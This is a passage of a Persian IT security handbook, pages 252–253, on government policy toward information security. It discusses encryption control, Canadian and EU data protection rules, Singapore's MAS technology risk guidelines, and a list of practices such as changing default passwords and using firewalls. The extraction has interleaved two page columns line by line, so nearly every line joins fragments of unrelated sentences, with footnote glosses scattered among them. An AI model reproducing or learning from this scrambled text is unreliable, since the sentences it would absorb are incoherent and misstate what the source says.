‫ﺿﻮﺍﺑﻂ ﺍﻳﻤﻨﻲ‪ ،‬ﺭﻗﺎﺑﺖ ﻭ ﺗﺄﺛﻴﺮﺍﺕ ﻣﺤﻴﻄﻲ ‪ -‬ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ‪ .‬ﺍﻣﺮﻭﺯﻩ‬ ‫ﻛﻨﻨﺪﺓ ﻛﺎﺭﺑﺮﺩ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺭﺍ ﺣـﺬﻑ ﻛﻨـﺪ ﻳـﺎ ﻛـﺎﻫﺶ ﺩﻫـﺪ‪ .‬ﺩﺭ‬
‫ﻗﺎﻧﻮﻧﮕــﺬﺍﺭﺍﻥ ﺑﻄــﻮﺭ ﻓﺮﺁﻳﻨــﺪﻩﺍﻱ ﺍﻣﻨﻴــﺖ ﺳــﺎﻳﺒﺮ ﺭﺍ ﺩﺭ ﻓﻬﺮﺳــﺖ‬ ‫ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ‪ ،‬ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘـﻪ ﻛـﻪ ﺩﺭ ﮔﺬﺷـﺘﻪ ﺑـﺪﻧﺒﺎﻝ‬
‫ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﺩﻭﻟﺘﻬﺎ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ ﻣﻲﺁﻭﺭﻧﺪ‪.‬‬ ‫ﻛﻨﺘﺮﻝ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻮﺩﻧﺪ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳـﻴﺪﻧﺪ ﻛـﻪ ﺩﺭ ﺣﺎﻟـﺖ‬
‫ﻛﻠﻲ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺑﺎﻋـﺚ ﺍﻓـﺰﺍﻳﺶ ﺍﻣﻨﻴـﺖ ﻣـﻲﺷـﻮﺩ‪ .‬ﺳﻴﺎﺳـﺖ‬
‫ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻣﻘﺮﺭﺍﺕ ﻣﺨـﺎﻃﺮﻩﺁﻣﻴـﺰ ﻫـﺴﺘﻨﺪ‪ .‬ﺍﻳﻨﺘﺮﻧـﺖ ﺍﺯ ﺑﻌـﻀﻲ‬
‫ﺟﻬﺎﺕ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻭﺳﻴﻠﺔ ﺍﺭﺗﺒﺎﻃﻲ ﺗﻘﺮﻳﺒﹰﺎ ﺑﻲﻗﺎﻧﻮﻥ ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ‬
‫‪88‬‬ ‫‪Anonymity‬‬
‫ﺍﺳﺖ‪ .‬ﺑﻄﻮﺭ ﻛﻠﻲ ﺭﻭﻧﺪ ﺟﻬﺎﻧﻲ ﺩﺭ ﺍﻭﺍﺧﺮ ﺩﻫﺔ ﮔﺬﺷـﺘﻪ ﺩﺭ ﺟﻬـﺖ‬ ‫‪89‬‬ ‫‪The Legitimity of Anonymous‬‬
‫‪Communications‬‬
‫ﻗﺎﻧﻮﻥﺯﺩﺍﻳﻲ ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺑﻮﺩﻩ ﺍﺳﺖ‪ .‬ﺭﻗﺎﺑـﺖ ﻭ ﻧـﻮﺁﻭﺭﻱ‪،‬‬ ‫‪90‬‬ ‫‪Authentication‬‬
‫‪91‬‬ ‫‪Encryption‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٥٢‬‬

‫ﺩﺍﺩﻩﻫﺎ ﺑﻜﺎﺭ ﮔﻴﺮﻧﺪ"‪ .‬ﻛﺎﻧﺎﺩﺍ ﺭﻭﻳﻜﺮﺩ ﻣـﺸﺎﺑﻬﻲ ﺭﺍ ﺩﺭﭘـﻴﺶ ﮔﺮﻓﺘـﻪ‬ ‫ﺣﺎﻣﻲ ﺗﻮﺳﻌﺔ ﺧﺪﻣﺎﺕ ﻭ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳـﺪ ﻫـﺴﺘﻨﺪ‪ ،‬ﻭ ﻣﻨـﺎﺑﻊ ﺭﺍ‬
‫ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ‪ ،‬ﺑﺮ ﺍﺳﺎﺱ ﻣـﺼﻮﺑﺔ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ‬ ‫ﻛﺎﻫﺶ ﻭ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺭﺍ ﺍﻓـﺰﺍﻳﺶ ﻣـﻲﺩﻫﻨـﺪ‪.‬‬
‫ﺷﺨﺼﻲ ﻭ ﻣﺪﺍﺭﻙ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ٩٢‬ﺷﺮﻛﺘﻬﺎﻱ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ‬ ‫ﺯﻣﺎﻧﻴﻜﻪ ﻓﻨﺎﻭﺭﻱ ﺑﻪ ﺳﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﺍﺳﺖ‪ ،‬ﻗـﻮﺍﻧﻴﻦ ﺩﻭﻟﺘـﻲ‬
‫ﻣﻮﻇﻔﻨﺪ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺷﺨـﺼﻲ ﺗـﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘـﻲ‬ ‫ﺳﺪ ﺭﺍﻩ ﺍﺟﺮﺍﻱ ﺭﺍﻩﺣﻠﻬﺎﻱ ﺍﺑﺘﻜﺎﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺧﺎﺻﻲ ﺑﻴﺎﻧﺪﻳﺸﻨﺪ‪.‬‬ ‫ﺩﺭﻧﺘﻴﺠﻪ ﺍﻳﻦ ﺳﺆﺍﻝ ﺍﺳﺎﺳﻲ ﻣﻄﺮﺡ ﻣﻲﺷﻮﺩ ﻛـﻪ ﺑﻬﺘـﺮﻳﻦ ﺭﻭﺵ‬
‫ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﻣﻔﺼﻞﺗﺮﻱ ﺭﺍ ﺑﻪ ﭼﺎﭖ ﺭﺳﺎﻧﺪﻩ ﺍﺳـﺖ‬ ‫ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﭼﻴﺴﺖ؟ ﺑﻄـﻮﺭ ﻛﻠـﻲ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ‬
‫ﻛــﻪ ﺑــﻪ ﻗــﻮﺍﻧﻴﻦ ﻣﺮﺑــﻮﻁ ﺑــﻪ ﺣﻔﺎﻇــﺖ ﺩﺭ ﺻــﻨﻌﺖ ﺍﺭﺗﺒﺎﻃــﺎﺕ‬ ‫ﺍﺻﻞ ﺍﺳﺎﺳﻲ‪ ،‬ﺩﻭﻟﺖ ﻧﺒﺎﻳﺪ ﺿﻮﺍﺑﻂ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺑـﻪ ﮔﺮﺩﺍﻧﻨـﺪﮔﺎﻥ ﻭ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲ ﭘـﺮﺩﺍﺯﺩ‪ .‬ﻣـﺎﺩﺓ ‪ ۴‬ﺍﻳـﻦ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻞ ﻣـﺸﺨﺺ‬ ‫ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺗﺤﻤﻴﻞ ﻛﻨﺪ‪ .‬ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ‬
‫ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﻳﻚ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﻩ ﺧﺪﻣﺎﺕ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ "ﺑﺎﻳﺪ‬ ‫ﺑﺎﻭﺭ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ﻭ ﺿﻮﺍﺑﻂ ﻣﺮﺗﺒﻂ ﺑﺎ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺗﺄﺛﻴﺮ‬
‫ﺍﻗﺪﺍﻣﺎﺗﻲ ﺭﺍ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻣﻨﻴﺖ ﺧﺪﻣﺎﺕ ﺧـﻮﺩ ﻭ ﺩﺭﺻـﻮﺭﺕ‬ ‫ﻭ ﺣﺘﻲ ﮔﺎﻫﻲ ﺯﻳﺎﻥﺁﻭﺭ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﻟﺰﻭﻡ ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋﻪ ﻛﻨﻨﺪﮔﺎﻥ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻋﻤﻮﻣﻲ ﺷﺒﻜﻪ )ﺑﺎ ﺗﻮﺟﻪ ﺑـﻪ‬
‫ﺩﺭ ﻋﻮﺽ ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺗﺤﻤﻴﻞ ﺍﻟﺰﺍﻣﺎﺕ ﻛﻠﻲ ﺣﻔـﻆ‬
‫ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ( ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪ ".‬ﺩﻭﻡ ﺍﻳﻨﻜـﻪ ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﮔﺎﻥ ﺍﺭﺗﺒﺎﻃـﺎﺕ‬
‫ﺍﻣﻨﻴﺖ ﺍﺳﺖ‪ .‬ﺍﻳـﻦ ﺭﻭﻳﻜـﺮﺩ ﻛـﻪ ﺍﺯ ﻣﻔﻬـﻮﻡ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺣـﺮﻳﻢ‬
‫ﻋﻤﻮﻣﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺑﺎﻳﺪ ﺑﻪ ﻣﺸﺘﺮﻛﻴﻦ ﺩﺭ ﻣﻮﺭﺩ ﻫﺮ ﻧﻮﻉ ﺗﻬﺪﻳـﺪ‬
‫ﺧﺼﻮﺻﻲ ﺑﺮﺧﺎﺳﺘﻪ ﺑﻮﺩ‪ ،‬ﺩﺭ ﺗﻤـﺎﻣﻲ ﺑﺨـﺸﻬﺎﻳﻲ ﻛـﻪ ﺩﺍﺩﻩ ﻫـﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ﻫﺸﺪﺍﺭ ﺩﻫﻨﺪ ﻭ "ﺯﻣـﺎﻧﻲ ﻛـﻪ ﺧﻄـﺮ ﺩﺭ ﺧـﺎﺭﺝ ﺍﺯ ﺣﻴﻄـﻪ‬
‫ﺷﺨﺼﻲ ﺭﺍ ﺟﻤـﻊﺁﻭﺭﻱ ﻭ ﭘـﺮﺩﺍﺯﺵ ﻣـﻲﻛﺮﺩﻧـﺪ ﺍﺟﺒـﺎﺭﻱ ﺷـﺪ‪.‬‬
‫ﻗﺪﺭﺕ ﻭ ﺍﺧﺘﻴﺎﺭ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﺳـﺖ ﻫـﺮ ﻧـﻮﻉ ﺗﻐﻴﻴـﺮ ﺍﺯ‬ ‫ﺭﻭﻳﻜﺮﺩ ﺩﻳﮕﺮ ﺗﻤﺮﻛـﺰ ﺑـﺮ ﺑﺨـﺸﻬﺎﻱ ﺧـﺎﺹ ﺍﻗﺘـﺼﺎﺩﻱ ﺍﺳـﺖ‪.‬‬
‫ﺟﻤﻠﻪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻧﺪ‪".‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺩﺭ ﺿـﻮﺍﺑﻄﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺣـﺮﻳﻢ‬
‫ﭼﮕﻮﻧﻪ ﺍﻳﻦ ﺍﻟﺰﺍﻣﺎﺕ ﻛﻠﻲ ﻋﻤﻠﻲ ﻣـﻲﺷـﻮﻧﺪ؟ ﺳـﻨﮕﺎﭘﻮﺭ ﺩﺭ ﺍﻳـﻦ‬ ‫ﺧﺼﻮﺻﻲ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺧﺪﻣﺎﺕ ﺑﻬﺪﺍﺷﺘﻲ ﻭ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻭﺿﻊ‬
‫‪٩٣‬‬
‫ﻣﻮﺭﺩ ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺧﺎﺹ ﺩﺍﺭﺩ‪ .‬ﻣﻘﺎﻣﺎﺕ ﻣﺎﻟﻲ ﺳﻨﮕﺎﭘﻮﺭ )‪(MAS‬‬ ‫ﻛﺮﺩﻩ‪ ،‬ﺍﻟﺰﺍﻣﺎﺗﻲ ﻧﻴﺰ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻣﻨﻴﺖ ﺩﺍﺩﻩﻫـﺎﻱ ﺷﺨـﺼﻲ‬
‫ﻳﻜﺴﺮﻱ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺟﺎﻣﻊ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺩﺭ ﺭﻫﻨﻤﻮﻧﻬﺎﻱ‬ ‫ﮔﻨﺠﺎﻧﺪﻩ ﺍﺳﺖ‪ .‬ﺳﻨﮕﺎﭘﻮﺭ ﻫﻢ ﺭﻭﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺗﻤﺮﻛـﺰ ﻛـﺮﺩﻩ؛‬
‫ﻣﺪﻳﺮﻳﺖ ﺧﻄﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ‪ ٩٤‬ﺑﺮﺍﻱ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﺍﻋﻼﻡ ﻛﺮﺩﻧﺪ‪.‬‬ ‫ﺍﻣﺎ ﻧﻪ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ‪ -‬ﺧﻂﻣـﺸﻲﻫـﺎﻱ‬
‫ﺍﻳﻦ ﺭﻫﻨﻤﻮﻧﻬﺎ ﺑﺪﻧﺒﺎﻝ ﺍﺭﺗﻘـﺎ ﻭ ﺑﻬﺒـﻮﺩ ﻓﺮﺁﻳﻨـﺪﻫـﺎﻱ ﺻـﺤﻴﺢ ﺩﺭ‬ ‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺳـﻨﮕﺎﭘﻮﺭ ﺩﺭ ﺧـﺼﻮﺹ ﺍﺩﺍﺭﻩﻫـﺎﻱ ﺧـﺪﻣﺎﺕ‬
‫ﻣﺪﻳﺮﻳﺖ ﺧﻄﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ﻭ ﻛﺎﺭﺑﺮﺩ ﺭﻭﻳﻜﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻮﺩ ﺍﻣـﺎ‬ ‫ﻣﺎﻟﻲ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﻪ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﭘﺮﺩﺍﺧﺘﻪﺍﻧﺪ ﻭ ﻧﻪ ﺗﻬﺪﻳـﺪﺍﺕ‬
‫ﺭﻋﺎﻳﺖ ﺁﻥ ﺑﺮﺍﻱ ﻛﺴﻲ ﺍﺟﺒﺎﺭﻱ ﻧﺪﺍﺷﺖ‪ .‬ﺩﺭﻋﻮﺽ ﻫﻤﺎﻧﻄﻮﺭ ﻛـﻪ‬ ‫ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺭﻭﺷـﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺑـﺮﺍﻱ ﺗﺒـﺪﻳﻞ‬
‫ﺩﺭ ﺧﻂﻣﺸﻲﻫﺎ ﺫﻛﺮ ﺷﺪﻩ‪" :‬ﻣﻘﺎﻣﺎﺕ ﻣﺎﻟﻲ ﺳﻨﮕﺎﭘﻮﺭ ﺑﻨﺎ ﺩﺍﺭﻧﺪ ﺍﻳـﻦ‬ ‫ﺍﻟﺰﺍﻣﺎﺕ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺑﻪ ﻣﺮﺍﺣﻞ ﺍﻣﻨﻴﺘﻲ ﮔﺎﻡ ﺑﻪ ﮔـﺎﻡ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﺭﻭﻳﻜﺮﺩﻫــﺎ ﺭﺍ ﺩﺭ ﻧﻈــﺎﺭﺕ ﺑــﺮ ﺍﺭﺯﻳــﺎﺑﻲ ﺗﻬﺪﻳــﺪﺍﺕ ﻓﻨــﺎﻭﺭﻱ ﻭ‬ ‫ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺑﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﻭﻟﺖ‪ ،‬ﺗﺄﻛﻴـﺪ ﺑـﺮ‬
‫ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ ﻭﺍﺭﺩ ﻛﻨﻨـﺪ‪ .‬ﻫـﺮ ﻣﺆﺳـﺴﻪ‬ ‫ﻓﺮﺁﻳﻨﺪﻫﺎ ﺑﻪ ﺟـﺎﻱ ﻓﻨﺎﻭﺭﻳﻬـﺎ ﻣـﻲ ﺑﺎﺷـﺪ‪ .‬ﺭﻭﻳﻜـﺮﺩ ﺩﻳﮕـﺮ ﺗﻬﻴـﺔ‬
‫ﺩﺭﺻﻮﺭﺕ ﺍﺟﺮﺍﻱ ﺍﻳﻦ ﺧﻂﻣـﺸﻲﻫـﺎ ﺍﺯ ﻃـﺮﻑ ‪ MAS‬ﺻـﺎﺣﺐ‬ ‫ﺧﻂﻣﺸﻲﻫﺎ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺭﻭﻳﻜﺮﺩﻫﺎ ﻣـﻲ ﺗﻮﺍﻧﻨـﺪ ﻣﻜﻤـﻞ ﻳﻜـﺪﻳﮕﺮ‬
‫ﻣﻨﺎﻓﻊ ﻭﻳﮋﻩﺍﻱ ﺧﻮﺍﻫﺪ ﺷﺪ‪ ،‬ﻭ ﺑﻪ ﺍﻳﻦ ﺗﺮﺗﻴﺐ ﻣﺆﺳﺴﺎﺕ ﻣـﺎﻟﻲ ﺑـﻪ‬ ‫ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺗﻼﺵ ﺑﺮﺍﻱ ﻫﻤﺎﻫﻨﮕﻲ ﺑﺎ ﺧﻂﻣﺸﻲﻫﺎ ﺗـﺸﻮﻳﻖ ﺷـﺪﻩﺍﻧـﺪ‪ ".‬ﺍﻳـﻦ‬ ‫ﺍﺭﻭﭘﺎ ﺍﻋﻤﺎﻝ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘﻲ ﺟﺪﻳﺪ ﺭﺍ ﺩﺭ ﺗﻤـﺎﻣﻲ ﺑﺨـﺸﻬﺎﻳﻲ ﻛـﻪ‬
‫ﺧﻂﻣﺸﻲﻫﺎ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺑﺮﺍﻱ ﻣﺆﺳﺴﺎﺕ ﺑﻪ ﺣـﺴﺎﺏ‬ ‫ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺭﺍ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﭘﺮﺩﺍﺯﺵ ﻣﻲﻛﻨﻨﺪ ﺁﻏﺎﺯ ﻛـﺮﺩﻩ‬
‫ﺑﻴﺎﻳﻨﺪ‪ .‬ﻓﻬﺮﺳﺖ ﺫﻳﻞ ﺩﺭ ﻣﻮﺭﺩ ﺷﻴﻮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ‬ ‫ﺍﺳﺖ‪ .‬ﻣﺎﺩﺓ ‪ ۱۷‬ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩﻫـﺎﻱ ﺍﺗﺤﺎﺩﻳـﺔ ﺍﺭﻭﭘـﺎ‬
‫"ﺑﺎﻳﺪ"ﻫﺎﻳﻲ ﺭﺍ ﺑﺮ ﻣﻲﺷﻤﺎﺭﺩ‪:‬‬ ‫ﺩﺍﺭﻧﺪﮔﺎﻥ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﺮﻡ ﺍﻓـﺰﺍﺭﻱ ﻭ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ ﺑﺎﻳـﺪ ﺑـﻪ‬ ‫•‬ ‫ﺍﺯ ﺁﻥ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﺗﺨﺮﻳﺐ‪ ،‬ﺗﻐﻴﻴﺮ‪ ،‬ﺍﻓـﺸﺎﺳﺎﺯﻱ ﻳـﺎ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺑﺎﻻﺗﺮﻳﻦ ﺩﺭﺟﺔ ﺍﻣﻨﻴﺖ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻣﺠﻬﺰ ﺷﻮﻧﺪ‪ ،‬ﻭ ﺩﺭ ﺟﻬﺖ‬ ‫ﻏﻴﺮﻗﺎﻧﻮﻧﻲ )ﺑﻮﻳﮋﻩ ﺯﻣﺎﻧﻲ ﻛـﻪ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﺷـﺎﻣﻞ ﺍﻧﺘﻘـﺎﻝ ﺩﺍﺩﻩﻫـﺎ ﻣﻴـﺎﻥ‬
‫ﺷﺒﻜﻪﻫﺎ ﺑﺎﺷﺪ( ﺍﻗﺪﺍﻣﺎﺕ ﺳﺎﺯﻣﺎﻧﻲ ﻭ ﻓﻨﻮﻥ ﻣﻨﺎﺳﺐ ﺭﺍ ﺑﻜـﺎﺭ ﮔﻴﺮﻧـﺪ‪.‬‬
‫‪92‬‬ ‫‪Personal Information Protection And‬‬ ‫ﺍﻳﻦ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﻫﻤﭽﻨﻴﻦ ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ "ﭼﻨﻴﻦ ﺍﻗﺪﺍﻣﺎﺗﻲ ﺑﺎﻳـﺪ‬
‫‪Electronic Documents Act‬‬
‫‪93‬‬ ‫‪Monetary Authority of Singapore‬‬ ‫ﺳﻄﺢ ﻣﻨﺎﺳﺒﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑﺮ ﻣﺨﺎﻃﺮﺍﺕ ﻃﺒﻴﻌﻲ ﭘـﺮﺩﺍﺯﺵ‬
‫‪94‬‬ ‫‪Technology Risk Management Guideline‬‬
‫‪٢٥٣‬‬ ‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬

‫ﻛﻔﺎﻳــﺖ ﺳﻴﺎﺳــﺘﻬﺎ‪ ،‬ﻓﺮﺁﻳﻨــﺪﻫﺎ‪ ،‬ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋــﺎﺕ‬ ‫•‬ ‫ﺗﻘﻮﻳﺖ‪ ،‬ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻭ ﺍﻗﺪﺍﻣﺎﺕ ﭘﻴﺸﻨﻬﺎﺩﻱ ﺩﻳﮕﺮ ﺍﺯ ﻃﺮﻑ‬
‫ﺧﺮﻳﺪﺍﺭﺍﻥ ﻭ ﺳﺎﻳﺮ ﺍﻗﺪﺍﻣﺎﺕ ﻛﻨﺘﺮﻝ ﻣﺨﺎﻃﺮﻩ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﺪ‪.‬‬ ‫ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺳﻴﺴﺘﻢ ﮔﺎﻡ ﺑﺮﺩﺍﺭﻧﺪ؛‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻣﺨـﺎﻃﺮﺍﺕ ﻃﺮﺍﺣـﻲ‬ ‫ﺗﻤﺎﻣﻲ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﻭﻟﻴﻪ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺟﺪﻳـﺪ ﺑﺎﻳـﺪ‬ ‫•‬
‫ﺷــﺪﻩﺍﻧــﺪ ﻭ ﺑــﺎ ﺣــﺴﺎﺳﻴﺖ‪ ،‬ﭘﻴﭽﻴــﺪﮔﻲ‪ ،‬ﻭ ﺣــﻮﺯﺓ ﺗﺄﺛﻴﺮﮔــﺬﺍﺭﻱ‬ ‫ﻓﻮﺭﹰﺍ ﭘﺲ ﺍﺯ ﻧﺼﺐ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﻮﻧﺪ؛ ﭼﺮﺍﻛﻪ ﻣﻬـﺎﺟﻤﻴﻦ ﺩﺭ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﺘﻨﺎﺳﺐ ﻫـﺴﺘﻨﺪ‪ .‬ﺑـﺮﺍﻱ ﺍﺟـﺮﺍﻱ ﻗـﻮﺍﻧﻴﻦ ﺑـﻪ ﺩﺳـﺘﺔ‬ ‫ﺣﺪ ﻭﺳﻴﻌﻲ ﺍﺯ ﺁﻧﻬﺎ ﺁﮔﺎﻫﻲ ﺩﺍﺭﻧﺪ؛‬
‫ﻭﺳﻴﻌﻲ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺎﺯ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﺑﻜﺎﺭ‬
‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗـﺶ ﺑﺎﻳـﺪ ﺩﺭ ﻣﻴـﺎﻥ ﺷـﺒﻜﻪﻫـﺎﻱ ﺩﺍﺧﻠـﻲ ﻭ‬ ‫•‬
‫ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﺗﺪﺍﺑﻴﺮ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬ ‫ﺧﺎﺭﺟﻲ ﻭ ﻫﻤﭽﻨـﻴﻦ ﺩﺭ ﻣﻴـﺎﻥ ﭘﺎﻳﮕﺎﻫﻬـﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻧﻈـﺮ‬
‫ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﺧﺮﻳـﺪﺍﺭﺍﻥ‬ ‫•‬ ‫ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﻣﺠﺰﺍ ﻫﺴﺘﻨﺪ ﻧﺼﺐ ﺷﻮﻧﺪ؛ ﻭ‬
